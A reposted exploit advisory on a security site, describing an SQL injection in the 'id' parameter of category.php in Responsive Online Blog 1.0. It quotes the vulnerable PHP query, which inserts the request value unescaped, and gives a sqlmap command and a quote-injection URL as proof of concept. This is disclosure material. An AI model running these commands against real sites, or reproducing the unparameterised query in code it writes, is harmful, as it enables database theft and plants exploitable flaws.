Exploit/Advisories

Published on June 24th, 2020 📆 | 7546 Views ⚑

Responsive Online Blog 1.0 SQL Injection ≈ Packet Storm

https://www.ispeech.org

Responsive Online Blog 1.0 SQL Injection: Posted Jun 23, 2020; Authored by Eren Simsek; Responsive Online Blog version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; MD5 | 19e8f36d67f7fb0e83cc09a4e6b3d12f; Download | Favorite | View

# Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection
# Date: 2020-06-23
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
# Version: v1.0
# Tested on: Linux - Wamp Server>Vulnerable File
/category.php
>Vulnerable Code











$id=$_REQUEST['id'];
$query="SELECT * from blog_categories where id='".$id."'";
Id parameter enters sql query without any changes
>Proof Of Concept
sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch
OR
http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error

Source link

Tagged with: advisory • blog • CSRF • exploit • injection • online • overflow • packet • responsive • scanner • security • SQL • storm • vulnerability • whitepaper • XSS

Comments are closed.

Responsive Online Blog 1.0 SQL Injection ≈ Packet Storm

🌟 Your Account

🔔 Email Subscriptions

Get new posts by email

Donate Via Wallets

Popular

Gloss

☕️Social Media

👥Members

🌍 Forum Groups